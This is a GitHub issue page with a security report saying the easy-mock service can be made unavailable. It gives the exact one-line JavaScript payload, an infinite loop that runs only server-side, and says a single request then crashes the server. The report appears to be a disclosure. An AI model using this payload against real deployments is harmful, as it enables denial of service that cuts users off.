Skip to content

SECURITY: make easy-mock service unavailable by just one-line code #113

@themostancientjokeintheworld

Description

Create a new mock API with this content:

(function() { if (typeof window === 'undefined') { while(true); } else return {} })()

Then make a request, the server will BOOM.

😇

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions